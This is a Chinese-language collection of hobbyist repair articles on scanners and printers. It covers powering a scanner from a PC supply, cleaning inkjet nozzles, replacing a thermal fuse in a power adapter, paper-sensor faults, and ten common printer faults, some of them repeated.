不花钱的扫描仪电源

《一键清理系统垃圾》

不花钱的扫描仪电源

    我的扫描仪是SCANPORT SQ300B型，它使用外接电源。某一日电源烧毁，拿去修理，但这种开关式电源是一次性的（连拆卸的螺丝都没有，只能野蛮地用刀撬开），不好修理。
        仔细看了看扫描仪上面的参数，上面写着OUTPUT:+12V，1.5A。想到计算机上的电源是5V和12V的，能不能替代呢？我就自己试一试，关闭计算机，找出一根闲置的电源接头，用万用表测得中间两根黑线是零电位，边上黄色的为12V，另一端为5V。把扫描仪的电源线剪断，一根接黄线，另一根接相邻的黑线（焊上或用牙签塞紧）。注意按照要求，电源的接口为内正外负，千万不可颠倒。拆下一块机箱挡板，把电源线固定好后引出。关闭计算机，接好扫描仪，重新开机，一切OK，扫描仪能正常工作！
        注意事项为：一、扫描仪电源的接口为内正外负（具体情况要看扫描仪的要求），不能颠倒，否则……；二、不能在开机状态下接上扫描仪电源。


打印机

《一键清理系统垃圾》

打印机

[color=Green]在办公室中，喷墨打印机是使用得较为普便的一种设备。喷墨打印机由于使用、保养、操作不当等原因经常会出现一些故障，如何解决是用户关心的问题。在此我们便将日常工作中的常见故障及处理方法总结出来，希望对大家有所帮助。 [/color]
[color=Red]常见故障一：打印时墨迹稀少，字迹无法辨认的处理，该故障多数是由于打印机长期未用或其他原因，造成墨水输送系统障碍或喷头堵塞。 [/color]
[color=Blue]排除的方法：如果喷头堵塞得不是很厉害，那么直接执行打印机上的清洗操作即可。如果多次清洗后仍没有效果，则可以拿下墨盒（对于墨盒喷嘴非一体的打印机，需要拿下喷嘴，但需要仔细），把喷嘴放在温水中浸泡一会，注意，一定不要把电路板部分也浸在水中，否则后果不堪设想，用吸水纸吸走沾有的水滴，装上后再清洗几次喷嘴就可以了。
[/color]

[color=Red]常见故障二：更换新墨盒后，打印机在开机时面板上的"墨尽"灯亮的处理 [/color]
[color=Blue]正常情况下，当墨水已用完时"墨尽"灯才会亮。更换新墨盒后，打印机面板上的"墨尽"灯还亮，发生这种故障，一是有可能墨盒未装好，另一种可能是在关机状态下自行拿下旧墨盒，更换上新的墨盒。因为重新更换墨盒后，打印机将对墨水输送系统进行充墨，而这一过程在关机状态下将无法进行，使得打印机无法检测到重新安装上的墨盒。另外，有些打印机对墨水容量的计量是使用打印机内部的电子计数器来进行计数的（特别是在对彩色墨水使用量的统计上），当该计数器达到一定值时，打印机判断墨水用尽。而在墨盒更换过程中，打印机将对其内部的电子计数器进行复位，从而确认安装了新的墨盒。
[/color]
[color=Orange]解决方法：打开电源，将打印头移动到墨盒更换位置。将墨盒安装好后，让打印机进行充墨，充墨过程结束后，故障排除。[/color]

[color=Red]常见故障三：喷头软性堵头的处理 [/color][color=Blue]软性堵头堵塞指的是因种种原因造成墨水在喷头上粘度变大所致的断线故障。一般用原装墨水盒经过多次清洗就可恢复，但这样的方法太浪费墨水。最简单的办法是利用你手中的空墨盒来进行喷头的清洗。用空墨盒清洗前，先要用针管将墨盒内残余墨水尽量抽出，越干净越好，然后加入清洗液（配件市场有售）。加注清洗液时，应在干净的环境中进行，将加好清洗液的墨盒按打印机正常的操作上机，不断按打印机的清洗键对其进行清洗。利用墨盒内残余墨水与清洗液混合的淡颜色进行打印测试，正常之后换上好墨盒就可以使用了。 [/color]

[color=Yellow]常见故障四：打印机清洗泵嘴的故障处理 [/color]
[color=Blue]打印机清洗泵嘴出毛病是较多的，也是造成堵头的主要因素之一。打印机清洗泵嘴对打印机喷头的保护起决定性作用。喷头小车回位后，要由清洗泵嘴对喷头进行弱抽气处理，对喷头进行密封保护。在打印机安装新墨盒或喷嘴有断线时，机器下端的抽吸泵要通过它对喷头进行抽气，此嘴的工作精度越高越好。但在实际使用中，它的性能及气密性会因时间的延长、灰尘及墨水在此嘴的残留凝固物增加而降低。如果使用者不对其经常进行检查或清洗，它会使你的打印机喷头不断出些故障。

    养护此部件的方法：将打印机的上盖卸下移开小车，用针管吸入纯净水对其进行冲洗，特别要对嘴内镶嵌的微孔垫片充分清洗。在此要特别提醒用户，清洗此部件时，千万不能用乙醇或甲醇对其进行清洗，这样会造成此组件中镶嵌的微孔垫片溶解变形。另外要提的是，喷墨打印机要尽量远离高温及灰尘的工作环境，只有良好的工作环境才能保证机器长久正常的使用。[/color]

[color=Red]常见故障五：检测墨线正常而打印精度明显变差的处理 [/color]
[color=Blue]喷墨打印机在使用中会因使用的次数及时间的延长而打印精度逐渐变差。喷墨打印机喷头也是有寿命的。一般一只新喷头从开始使用到寿命完结，如果不出什么故障较顺利的话，也就是20-40个墨盒的用量寿命。如果你的打印机已使用很久，现在的打印精度变差，你可以用更换墨盒的方法来试试，如果换了几个墨盒，其输出打印的结果都一样，那么你这台打印机的喷头将要更换了。如果更换墨盒以后有变化，说明可能你使用的墨盒中有质量较差的非原装墨水。

    如果打印机是新的，打印的结果不能令你满意，经常出现打印线段不清晰、文字图形歪斜、文字图形外边界模糊、打印出墨控制同步精度差，这说明你可能买到的是假墨盒或者使用的墨盒是非原装产品，应当对其立即更换。[/color]

[color=Red]常见故障六：行走小车错位碰头的处理 [/color]
[color=Blue]喷墨打印机行走小车的轨道是由两只粉末合金铜套与一根圆钢轴的精密结合来滑动完成的。虽然行走小车上设计安装有一片含油毡垫以补充轴上润滑油，但因我们生活的环境中到处都有灰尘，时间一久，会因空气的氧化，灰尘的破坏使轴表面的润滑油老化而失效，这时如果继续使用打印机，就会因轴与铜套的摩擦力增大而造成小车行走错位，直至碰撞车头造成无法使用。

    解决的办法是：一旦出现此故障应立即关闭打印机电源，用手将未回位的小车推回停车位。找一小块海绵或毡，放在缝纫机油里浸饱油，用镊子夹住在主轴上来回擦。最好是将主轴拆下来，洗净后上油，这样的效果最好。

    另一种小车碰头是因为器件损坏所致。打印机小车停车位的上方有一只光电传感器，它是向打印机主板提供打印小车复位信号的重要元件。此元件如果因灰尘太大或损坏，打印机的小车会因找不到回位信号碰到车头，而导致无法使用，一般出此故障时需要更换器件。


打印机的几种常见故障和处理方法

《一键清理系统垃圾》

打印机的几种常见故障和处理方法

一、打印大文件死机：

有的激光打印机在打印小的文件时正常，但打印大文件时会死机。

处理方法是：查看硬盘上的剩余空间。删除一些无用文件，或者查询打印机内存数量，是否可以扩容？

二、打印时出现一个红叉：

一般用EPSON－MJ1500打印机，经常发生打印时出现一个红叉的现象。

处理方法是：看进纸是否顺利，使用的纸张是否符合要求。因为一些打印机要80克或75克纸。而有的打印纸的正反面放反了也会造成进纸不畅而出现红叉。如果是水平进纸，应使光滑面朝下；如果是垂直方向进纸，应使光滑面朝前。

三、不定时的不打印：

EPSON 440打印机在驻留VRV杀毒软件时不一定什么时候就不能打印。

处理方法：依次将频幕右下角任务栏上的图标挂起，看结果如何。多可以使用鼠标右键单击图标，选择“挂起”功能即可。如KILL 98 的实时监测软件，可以选择“挂起实施监控器”，但若选择“关闭实施监控器”则可能使KILL 98 很难恢复，即使重装KILL 98 。

四、打印机信号不同步：

有的电脑使用EPSON打印机可以正常输出，但使用HP LASER JET 1100就不正常了，打印测试页异常：标题右偏，打印的文件少几个。HP打印机自检是正常使用。使用Windows 98 的 HP LASER JET 驱动可以正常打印测试页，但字的质量不高。

处理方法：尝试安装 Windows 9X 光盘上的HP LASER JET 打印驱动程序，然后再改回 HP LASER JET 打印驱动程序，然后再改回 HP LASER JET 1100 的打印驱动。

五、打印机打印过程中出现乱码的解决：

可依据以下步骤来判断故障

（1）使用KV300启动电脑，执行KV300。检查/清除病毒。

（2）打印机自检。（判断打印机本身是否存在硬件故障）

（3）检测打印机电缆：（判断打印电缆是否存在故障）在MS-DOS下，执行以下命令：dir>prn。

（4）在Windows 95下，打印测试页：（判断打印机驱动程序是否正确）“我的电脑”>>“打印机”>>找到对应的打印机>>右击鼠标右键>>弹出菜单，选择“属性”>>选择“常规”>>单击“打印测试页”。测试页正常表明已经正确安装打印机驱动程序。

（5）检查用于打印的应用软件（如Word），看其中的驱动程序和正在使用的打印机是否匹配。如不正确，就要换新的驱动程序了。

注：如果打印机通过扫描仪与计算机连接，可能会导致打印不正常，建议把打印机与计算机直接连接。

六、个别字体打印不出：

有时一直使用几种常见的字体和字号，最近改了几种字体，发现字体根本出不来或个别字没有了。

处理方法：先删除有问题的字体。删除字体先选择某种字体，然后再选“文件”＝》“删除”以前的不用字体。然后再双击“我的电脑”>>“控制面板”>>“字体”>>“文件”>>“安装新字体”。

七、不能使用双向打印：

EPSON LQ 1600K 在 Windows98 的 Word 97 下不支持双向打印。怎样才能使它支持双向打印而提高打印速度呢？

处理方法：Windows 不支持该型号打印机的双向打印。


打印机电源变压器的修理

《一键清理系统垃圾》

打印机电源变压器的修理

    近日，朋友拿来一台CANON 210SP型打印机。在某日发觉该机无电源输出，让我给他修理一下。用万用表电压挡测量后发现交流转换器（外置变压器AC-DC）无电压输出！
        因该变压器为13.5V 、最大输出电流为1A，市面上很难买到。观其外壳上标有电工标记和温度保险标记，判断可能为温度保险丝被熔断，用万用表电阻挡测量初级线圈（220V输入端）为无穷大，说明电路为开路。该变压器具有封闭的外壳，可用锯条沿其边缝锯开，拿出内部的小型变压器。在初级线圈输入端，用针将线圈外的青壳绝缘纸小心地、一层一层地挑开，即可发现一片小小的方形黄色熔断器。用万用表测量熔断器两脚为开路状态，证实它确已损坏！可将一个0.5A/250V的普通玻璃保险管打碎，取其中间的熔丝，用电烙铁将它焊在原方形熔断器的两脚上，再将绝缘青壳纸复原，并用绝缘胶带粘好，最后罩上外壳，用胶粘好。通电一试电压恢复正常。
        此方法可修理许多类似的MODEN、打印机、手机等较高质量的外置电源转换变压器。因为这些大厂出的变压器里都装有小型温度熔断器，主要起到控制温度和控制电流的作用，当变压器温度超过额定温度或者输入端电流超过额定电流时，熔断器被熔断而开路，从而起到保护作用。


打印机检测器主要故障分析与修复

《一键清理系统垃圾》

打印机检测器主要故障分析与修复

    一、缺纸检测器（PE检测器）
    该检测器为光电耦合器件，装在进纸槽中，功能是检测打印机当前是否有纸。当有纸时，发光二级管的光线可由纸反射，到达光电管，使其导通，向CPU发出＋5V信号。如果用户未给打印机上纸或纸已用尽，发光管的光线不能到达光电管，使其截止，向CPU发出OV信号，用户通过蜂鸣器与缺纸灯收到报警。
    缺纸检测器很容易出错，但一般也很容易解决，在STAR通用打印机中，该检测器的发光面与受光面一般都以一定角度向上放置，容易蒙上灰尘，阻挡光纸传播，导致光电管恒为截止。 下面介绍一例故障。
    故障现象：一台AR3200打印机，进纸时，每次只能上纸几厘米。连续按[装纸/退纸/出纸]键，虽可上纸，但是压纸杆不抬，联机灯不亮，打印机仍报缺纸。
    首先，AR3200打印机进纸过程如下：（1）短进纸，把纸送到缺纸检测器上方，检测器确认有纸后，执行下一个过程，如果检测器认为无纸，进纸动作结束。（2）长进纸，抬起压纸杆，根据纸头空设置把纸送到打印位置，联机准备打印。在本次故障中，显然反复执行了过程（1），即由于打印机判断无纸结束，因此不能联机打印。故障一经明确，剩下的工作也就很简单，擦拭即可。需要注意的是，非平推式STAR打印机中，一般需要拆下后盖才可以擦拭，而且应再把走纸方式转换成链式，扩大滚轴与检测器之间的距离以便操作。
    需要注意的是，检测器误报缺纸，不一定就是由于检测器本身的错误引起的。 使用有颜色或已有字符的打印纸，能够吸收较多的光线，同样会导致光电管不完全导通，使用不能联机。此时一般有以下三种方法可以选择：
    （1）修改EDS设置，使缺纸检测无效（设置方法见随机操作手册）。打印机将无条件联机打印，而不管是否有纸。但是，这样做有一个缺点就是当用户用尽纸时，打印机也会在胶棍上继续做无意义的打印。因此，一般不推荐用户使用这一功能。
    （2）从硬件上想办法，验纸信号是从光电三极管对地电阻上取走的。为适应信号较弱的情况，可以把该电阻更换，用更大阻值的电阻代替。提高＋5V电源在其上的分压，提高信号值。这与光电管完全导通时，有较大电流通过该电阻，得到较高信号值是一样的。
    （3）对于新型STAR打印机用户来说，有另外一种选择，就是作软件修改。例如AR6400打印机，可以通过DOS下的QBASIC语言修改EEPROM，以使打印机适应更弱的信号。
    二、压纸杆位置检测器
    该检测器是一个机械开关。当压纸杆落下时开关打开，发出＋5V信号；压纸杆升起时开关闭合， 发出OV信号。压纸杆在进纸开始时抬起，进纸终了时落下，如果用户在EDS中设置了1/6英寸纸头空，压纸杆会滞留一段时间，在打印过程中再落下。假如压纸杆不能到位，打印机将报错死机。下面介绍一故障实例。
    故障现象：一台AR3200打印机，进纸时压纸杆抬起后，机架左侧发出噪音，随后死机。
    AR3200与AR3200＋型打印机不需要专用继电器，而是通过一系列复杂的齿轮操作完成压纸杆动作的。具体说，就是在进纸时用字车撞击机架左侧的弹簧，推动压纸杆驱动齿轮左移，与走纸电机齿轮组接触，于是走纸电机带动了压纸杆，使其到位。然后字车右移，弹簧伸展，驱动齿轮与走纸电机齿轮组脱离接触，压纸杆停止运动。本打印机齿轮已经损坏，驱动齿轮无法带动压纸杆运动，摩擦时发出噪音，由于检测器发现压纸杆不能到位，使打印机死机。更换齿轮后故障消失。
    三、送纸调杆位置检测器
     该检测器是一个机械开关，用于监视用户对送纸方式的选择。当用户使用摩擦送纸方式时，通过送纸调杆使开关闭合，发出OV信号给CPU。相反，如果用户使用链式送纸方式时，则开关打开，把＋5V信号送给CPU。该开关一旦变形，同样会报告错误的信号。


打印机喷嘴清洗必杀武器

《一键清理系统垃圾》

打印机喷嘴清洗必杀武器

    Epson喷墨打印机以其独特的喷头技术、精美的打印效果而著称，也正因此Epson的喷嘴极易被堵塞，在打印时形成断线。虽然Epson打印机自带了打印头清洗功能，但这是以白白喷掉昂贵的墨水为代价，而且只有一种颜色被堵时其它各色也要清洗而被喷掉。 经过实践我终于发现了一种喷嘴清洗必杀武器——“蒸馏水”！其基本思路是将蒸馏水注入旧墨盒再换到打印机上清洗。由于蒸馏水未溶有其它物质、洁净度高、无腐蚀性，故溶解力强、不会对喷嘴造成额外的堵塞，清洗后打印精度不会下降，而且蒸馏水十分廉价。 下面以EPSON Stylus COLOR 600喷墨打印机为例给大家详细的介绍一下操作步骤。事先要准备好旧墨盒一套（黑色、彩色各一），一次性注射器、小锥针（圆规）各一只，宽约20mm的透明胶带，蒸馏水约30ml（万不得已也可用纯净水代替，关键是要确保没有固态杂质）。 用透明胶带将旧墨盒出墨口封死。由于Epson墨盒中没有气囊之内结构,故可放心地用锥针在各色墨盒背面（如图1）上分别钻孔，孔径约1～1.5mm。 用注射器取约6ml的蒸馏水，不要太多，超过7ml可能会溢出。将针头完全扎入小孔，一边注水一边抽出，让海绵均匀吸水，然后用透明胶封死注水孔。注水后的墨盒要将出墨口朝下正放，让水分下渗，切勿倒置，以免盒内墨水从盒顶进气孔倒流出来。注意：(1)不要为了偷懒不钻孔而直接向出墨口或进气孔注水，前者可能污染堵塞出墨口中的超精细滤网，后者则可能破坏墨盒内的气压平衡，最终使清洗适得其反；(2)旧墨盒最好是新近用完未干的，在保存时可用透明胶封住其出墨口及进气缝，模仿其未开封的状态，若墨盒已干则应提前2～6小时注水放置，以利于其中干涸的残墨完全化入蒸馏水。 在干净的环境中取下打印机中的墨盒。若打印机墨尽灯未闪烁，墨盒无法取出，可利用打印机开机自检时墨盒移出的机会立即拔掉其电源插头，迫使它停下取出墨盒。不用理会Epson的警告，这并不会损伤打印机，只是在清洗结束后会出现错误的墨尽报告，大可不必理会，只需待到墨水真的用完时换上新墨盒一切就可恢复正常！墨盒取下后要立即用透明胶将出墨口封牢、正放、备用。 换上注水的旧墨盒，重新通电打开打印机就可以开始清洗了。建议您通过软件来控制其清洗，即用“我的电脑”→“打印机”→右键单击“EPSON Stylus COLOR 600”→“属性”项→“应用工具”页中的“打印头清洗”按钮，可根据喷嘴被堵程度多次按下“清洗”，让其自己工作不劳您费神。如果堵塞严重，可按它一百次或更多。接下来将是一段较长时间的等待，但您不必再为墨水被浪费而心疼了，泡上一杯茶去做其它事吧。 待到清洗结束时可用“喷嘴检查”打印一份检查图形，虽然注入的是蒸馏水，但旧墨盒里的海绵中多少还有点儿残留颜料，仍可打出较浅的图形。确认所有喷孔均已被清洗干净后方可换上原墨盒或新墨盒。当然换上原墨盒后应和平时换新墨盒一样再清洗1～3次方可正常打印。


打印机十大共性故障解决方法

《一键清理系统垃圾》

打印机十大共性故障解决方法

2003-8-15
     打印机已是我们现代办公必备的设备，可以说它的使用大大减轻了我们的劳动强度，提高了工作效率，使办公环境更加轻松。可是由于各种原因，打印机在使用一段时间后经常出现这样或那样的故障，下面就将打印机经常出现的十个故障的检修方法与技巧介绍给大家，希望能够对大家使用和维修打印机有所帮助。

    一、打印机输出空白纸

    对于针式打印机，引起打印纸空白的原因大多是由于色带油墨干涸、色带拉断、打印头损坏等，应及时更换色带或维修打印头；对于喷墨打印机，引起打印空白的故障大多是由于喷嘴堵塞、墨盒没有墨水等，应清洗喷头或更换墨盒；而对于激光打印机，引起该类故障的原因可能是显影辊未吸到墨粉(显影辊的直流偏压未加上)，也可能是感光鼓未接地，使负电荷无法向地释放，激光束不能在感光鼓上起作用。

    另外，激光打印机的感光鼓不旋转，则不会有影像生成并传到纸上。断开打印机电源，取出墨粉盒，打开盒盖上的槽口，在感光鼓的非感光部位做个记号后重新装入机内。开机运行一会儿，再取出检查记号是否移动了，即可判断感光鼓是否工作正常。如果墨粉不能正常供给或激光束被挡住，也会出现打印空白纸的现象。因此，应检查墨粉是否用完、墨盒是否正确装入机内、密封胶带是否已被取掉或激光照射通道上是否有遮挡物。需要注意的是，检查时一定要将电源关闭，因为激光束可能会损坏操作者的眼睛。

    二、打印纸输出变黑

    对于针式打印机，引起该故障的原因是色带脱毛、色带上油墨过多、打印头脏污、色带质量差和推杆位置调得太近等，检修时应首先调节推杆位置，如故障不能排除，再更换色带，清洗打印头，一般即可排除故障；对于喷墨打印机，应重点检查喷头是否损坏、墨水管是否破裂、墨水的型号是否正常等；对于激光打印机，则大多是由于电晕放电丝失效或控制电路出现故障，使得激光一直发射，造成打印输出内容全黑。因此，应检查电晕放电丝是否已断开或电晕高压是否存在、激光束通路中的光束探测器是否工作正常。

    三、打印字符不全或字符不清晰

    对于喷墨打印机，可能有两方面原因，墨盒墨尽、打印机长时间不用或受日光直射而导致喷嘴堵塞。解决方法是可以换新墨盒或注墨水，如果墨盒未用完，可以断定是喷嘴堵塞：取下墨盒（对于墨盒喷嘴不是一体的打印机，需要取下喷嘴），把喷嘴放在温水中浸泡一会儿，注意一定不要把电路板部分浸在水中，否则后果不堪设想。

    对于针式打印机，可能有以下几方面原因：打印色带使用时间过长；打印头长时间没有清洗，脏物太多；打印头有断针；打印头驱动电路有故障。解决方法是先调节一下打印头与打印辊间的间距，故障不能排除，可以换新色带，如果还不行，就需要清洗打印头了。方法是：卸掉打印头上的两个固定螺钉，拿下打印头，用针或小钩清除打印头前、后夹杂的脏污，一般都是长时间积累的色带纤维等，再在打印头的后部看得见针的地方滴几滴仪表油，以清除一些脏污，不装色带空打几张纸，再装上色带，这样问题基本就可以解决，如果是打印头断针或是驱动电路问题，就只能更换打印针或驱动管了。

    四、打印字迹偏淡

    对于针式打印机，引起该类故障的原因大多是色带油墨干涸、打印头断针、推杆位置调得过远，可以用更换色带和调节推杆的方法来解决；对于喷墨打印机，喷嘴堵塞、墨水过干、墨水型号不正确、输墨管内进空气、打印机工作温度过高都会引起本故障，应对喷头、墨水盒等进行检测维修；对于激光打印机，当墨粉盒内的墨粉较少，显影辊的显影电压偏低和墨粉感光效果差时，也会造成打印字迹偏淡现象。此时，取出墨粉盒轻轻摇动，如果打印效果无改善，则应更换墨粉盒或调节打印机墨粉盒下方的一组感光开关，使之与墨粉的感光灵敏度匹配。

    五、打印时字迹一边清晰而另一边不清晰

    此现象一般出现在针式打印机上，喷墨打印机也可能出现，不过概率较小，主要是打印头导轨与打印辊不平行，导致两者距离有远有近所致。解决方法是可以调节打印头导轨与打印辊的间距，使其平行。具体做法是：分别拧松打印头导轨两边的调节片，逆时针转动调节片减小间隙，最后把打印头导轨与打印辊调节到平行就可解决问题。不过要注意调节时调对方向，可以逐渐调节，多打印几次。

    六、打印纸上重复出现污迹

    针式打印机重复出现脏污的故障大多是由于色带脱毛或油墨过多引起的，更换色带盒即可排除；喷墨打印机重复出现脏污是由于墨水盒或输墨管漏墨所致；当喷嘴性能不良时，喷出的墨水与剩余墨水不能很好断开而处于平衡状态，也会出现漏墨现象；而激光打印机出现此类现象有一定的规律性，由于一张纸通过打印机时，机内的12种轧辊转过不止一圈，最大的感光鼓转过2~3圈，送纸辊可能转过10圈，当纸上出现间隔相等的污迹时，可能是由脏污或损坏的轧辊引起的。

    七、打印头移动受阻，停下长鸣或在原处震动

    这主要是由于打印头导轨长时间滑动会变得干涩，打印头移动时就会受阻，到一定程度就会使打印停止，如不及时处理，严重时可以烧坏驱动电路。解决方法是在打印导轨上涂几滴仪表油，来回移动打印头，使其均匀分布。重新开机后，如果还有受阻现象，则有可能是驱动电路烧坏，需要拿到维修部了。

    八、打印机不打印

    引起打印机不打印的故障原因有很多种，有打印机方面的，也有计算机方面的。以下分别进行介绍：

    1. 检查打印机是否处于联机状态。在大多数打印机上“OnLine”按钮旁边都有一个指示联机状态的灯，正常情况下该联机灯应处于常亮状态。如果该指示灯不亮或处于闪烁状态，则说明联机不正常，重点检查打印机电源是否接通、打印机电源开关是否打开、打印机电缆是否正确连接等。如果联机指示灯正常，关掉打印机，然后再打开，看打印测试页是否正常。

    2. 检查打印机是否已设置为默认打印机。点击“开始/设置/打印机”，检查当前使用的打印机图标上是否有一黑色的小钩，然后将打印机设置为默认打印机。如果“打印机”窗口中没有使用的打印机，则点击“添加打印机”图标，然后根据提示进行安装。

    3. 检查当前打印机是否已设置为暂停打印。方法是在“打印机”窗口中用右键单击打印机图标，在出现的下拉菜单中检查“暂停打印”选项上是否有一小钩，如果选中了“暂停打印”请取消该选项。

    4. 在“记事本”中随便键入一些文字，然后单击“文件”菜单上的“打印”。如果能够打印测试文档，则说明使用的打印程序有问题，重点检查WPS、CCED、Word或其他应用程序是否选择了正确的打印机，如果是应用程序生成的打印文件，请检查应用程序生成的打印输出是否正确。

    5. 检查计算机的硬盘剩余空间是否过小。如果硬盘的可用空间低于10MB则无法打印，检查方法是在“我的电脑”中用右键单击安装Windows的硬盘图标，选择“属性”，在“常规”选项卡中检查硬盘空间，如果硬盘剩余空间低于10MB，则必须清空“回收站”，删除硬盘上的临时文件、过期或不再使用的文件，以释放更多的空间。

    6. 检查打印机驱动程序是否合适以及打印配置是否正确。在“打印机属性”窗口中“详细资料”选项中检查以下内容：在“打印到以下端口”选择框中，检查打印机端口设置是否正确，最常用的端口为“LPT1(打印机端口)”，但是有些打印机却要求使用其他端口；如果不能打印大型文件，则应重点检查“超时设置”栏目的各项“超时设置”值，此选项仅对直接与计算机相连的打印机有效，使用网络打印机时则无效。

    7. 检查计算机的BIOS设置中打印机端口是否打开。BIOS中打印机使用端口应设置为“Enable”，有些打印机不支持ECP类型的打印端口信号，应将打印端口设置为“Normal、 ECP+EPP”方式。

    8. 检查计算机中是否存在病毒，若有需要用杀毒软件进行杀毒。

    9. 检查打印机驱动程序是否已损坏。可用右键单击打印机图标，选择“删除”，然后双击“添加打印机”，重新安装打印机驱动程序。

    10. 打印机进纸盒无纸或卡纸，打印机墨粉盒、色带或碳粉盒是否有效，如无效，则不能打印。

    九、打印机卡纸或不能走纸

    打印机最常见的故障是卡纸。出现这种故障时，操作面板上指示灯会发亮，并向主机发出一个报警信号。出现这种故障的原因有很多，例如纸张输出路径内有杂物、输纸辊等部件转动失灵、纸盒不进纸、传感器故障等，排除这种故障的方法十分简单，只需打开机盖，取下被卡的纸即可，但要注意，必须按进纸方向取纸，绝不可反方向转动任何旋钮。

    如果经常卡纸，就要检查进纸通道，清除输出路径的杂物，纸的前部边缘要刚好在金属板的上面。检查出纸辊是否磨损或弹簧松脱，压力不够，即不能将纸送入机器。出纸辊磨损，一时无法更换时，可用缠绕橡皮筋的办法进行应急处理。缠绕橡皮筋后，增大了搓纸摩擦力，能使进纸恢复正常。此外，装纸盘安装不正常，纸张质量不好(过薄、过厚、受潮)，也会造成卡纸或不能取纸的故障。

    十、打印出现乱字符

    无论是针式打印机、喷墨打印机还是激光打印机出现打印乱码现象，大多是由于打印接口电路损坏或主控单片机损坏所致，而实际检修中发现，打印机接口电路损坏的故障较为常见，由于接口电路采用微电源供电，一旦接口带电拔插产生瞬间高压静电，就很容易击穿接口芯片，一般只要更换接口芯片，该类故障即可排除。另外，字库还没有正确载入打印机也会出现这种现象。

有零工作室　www.you0.com www.you0.net 联系QQ 3149886


打印机十大共性故障解决方法（二）

《一键清理系统垃圾》

打印机十大共性故障解决方法（二）

    七、打印头移动受阻，停下长鸣或在原处震动

    这主要是由于打印头导轨长时间滑动会变得干涩，打印头移动时就会受阻，到一定程度就会使打印停止，如不及时处理，严重时可以烧坏驱动电路。解决方法是在打印导轨上涂几滴仪表油，来回移动打印头，使其均匀分布。重新开机后，如果还有受阻现象，则有可能是驱动电路烧坏，需要拿到维修部了。

    八、打印机不打印

    引起打印机不打印的故障原因有很多种，有打印机方面的，也有计算机方面的。以下分别进行介绍：

    1. 检查打印机是否处于联机状态。在大多数打印机上“OnLine”按钮旁边都有一个指示联机状态的灯，正常情况下该联机灯应处于常亮状态。如果该指示灯不亮或处于闪烁状态，则说明联机不正常，重点检查打印机电源是否接通、打印机电源开关是否打开、打印机电缆是否正确连接等。如果联机指示灯正常，关掉打印机，然后再打开，看打印测试页是否正常。

    2. 检查打印机是否已设置为默认打印机。点击“开始/设置/打印机”，检查当前使用的打印机图标上是否有一黑色的小钩，然后将打印机设置为默认打印机。如果“打印机”窗口中没有使用的打印机，则点击“添加打印机”图标，然后根据提示进行安装。

    3. 检查当前打印机是否已设置为暂停打印。方法是在“打印机”窗口中用右键单击打印机图标，在出现的下拉菜单中检查“暂停打印”选项上是否有一小钩，如果选中了“暂停打印”请取消该选项。

    4. 在“记事本”中随便键入一些文字，然后单击“文件”菜单上的“打印”。如果能够打印测试文档，则说明使用的打印程序有问题，重点检查WPS、CCED、Word或其他应用程序是否选择了正确的打印机，如果是应用程序生成的打印文件，请检查应用程序生成的打印输出是否正确。

    5. 检查计算机的硬盘剩余空间是否过小。如果硬盘的可用空间低于10MB则无法打印，检查方法是在“我的电脑”中用右键单击安装Windows的硬盘图标，选择“属性”，在“常规”选项卡中检查硬盘空间，如果硬盘剩余空间低于10MB，则必须清空“回收站”，删除硬盘上的临时文件、过期或不再使用的文件，以释放更多的空间。

    6. 检查打印机驱动程序是否合适以及打印配置是否正确。在“打印机属性”窗口中“详细资料”选项中检查以下内容：在“打印到以下端口”选择框中，检查打印机端口设置是否正确，最常用的端口为“LPT1(打印机端口)”，但是有些打印机却要求使用其他端口；如果不能打印大型文件，则应重点检查“超时设置”栏目的各项“超时设置”值，此选项仅对直接与计算机相连的打印机有效，使用网络打印机时则无效。

    7. 检查计算机的BIOS设置中打印机端口是否打开。BIOS中打印机使用端口应设置为“Enable”，有些打印机不支持ECP类型的打印端口信号，应将打印端口设置为“Normal、 ECP+EPP”方式。

    8. 检查计算机中是否存在病毒，若有需要用杀毒软件进行杀毒。

    9. 检查打印机驱动程序是否已损坏。可用右键单击打印机图标，选择“删除”，然后双击“添加打印机”，重新安装打印机驱动程序。

    10. 打印机进纸盒无纸或卡纸，打印机墨粉盒、色带或碳粉盒是否有效，如无效，则不能打印。

    九、打印机卡纸或不能走纸

    打印机最常见的故障是卡纸。出现这种故障时，操作面板上指示灯会发亮，并向主机发出一个报警信号。出现这种故障的原因有很多，例如纸张输出路径内有杂物、输纸辊等部件转动失灵、纸盒不进纸、传感器故障等，排除这种故障的方法十分简单，只需打开机盖，取下被卡的纸即可，但要注意，必须按进纸方向取纸，绝不可反方向转动任何旋钮。

    如果经常卡纸，就要检查进纸通道，清除输出路径的杂物，纸的前部边缘要刚好在金属板的上面。检查出纸辊是否磨损或弹簧松脱，压力不够，即不能将纸送入机器。出纸辊磨损，一时无法更换时，可用缠绕橡皮筋的办法进行应急处理。缠绕橡皮筋后，增大了搓纸摩擦力，能使进纸恢复正常。此外，装纸盘安装不正常，纸张质量不好(过薄、过厚、受潮)，也会造成卡纸或不能取纸的故障。

    十、打印出现乱字符

    无论是针式打印机、喷墨打印机还是激光打印机出现打印乱码现象，大多是由于打印接口电路损坏或主控单片机损坏所致，而实际检修中发现，打印机接口电路损坏的故障较为常见，由于接口电路采用微电源供电，一旦接口带电拔插产生瞬间高压静电，就很容易击穿接口芯片，一般只要更换接口芯片，该类故障即可排除。另外，字库还没有正确载入打印机也会出现这种现象。


打印机十大共性故障解决方法（一）

《一键清理系统垃圾》

打印机十大共性故障解决方法（一）

    打印机已是我们现代办公必备的设备，可以说它的使用大大减轻了我们的劳动强度，提高了工作效率，使办公环境更加轻松。可是由于各种原因，打印机在使用一段时间后经常出现这样或那样的故障，下面就将打印机经常出现的十个故障的检修方法与技巧介绍给大家，希望能够对大家使用和维修打印机有所帮助。

    一、打印机输出空白纸

    对于针式打印机，引起打印纸空白的原因大多是由于色带油墨干涸、色带拉断、打印头损坏等，应及时更换色带或维修打印头；对于喷墨打印机，引起打印空白的故障大多是由于喷嘴堵塞、墨盒没有墨水等，应清洗喷头或更换墨盒；而对于激光打印机，引起该类故障的原因可能是显影辊未吸到墨粉(显影辊的直流偏压未加上)，也可能是感光鼓未接地，使负电荷无法向地释放，激光束不能在感光鼓上起作用。

